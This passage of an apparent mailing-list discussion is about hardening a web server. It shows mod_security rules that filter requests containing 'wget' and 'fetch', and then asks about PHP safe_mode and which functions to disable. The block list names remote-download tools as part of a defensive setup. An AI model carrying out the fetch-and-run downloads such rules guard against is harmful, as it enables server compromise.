file as follows:

SecFilter wget
SecFilter fetch


> of course you should secure your PHP (safe_mode, disable_functions, 
> open_basedir).

Does this apply if I am the only console user on the box?  I read that 
safe mode breaks some apps and it is most commonly useful when the box 
is shared.

Also, if I may, what are the most dangerous functions you disable with 
disable_functions?